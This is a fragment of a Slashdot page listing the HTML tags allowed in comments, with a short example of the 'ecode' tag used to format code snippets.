  • a
  • ol
  • ul
  • li
  • dl
  • dt
  • dd
  • em
  • strong
  • tt
  • blockquote
  • div
  • quote
  • ecode

"ecode" can be used for code snippets, for example:

<ecode>    while(1) { do_something(); } </ecode>
Sign up for Slashdot Newsletters
Create a Slashdot Account

Loading...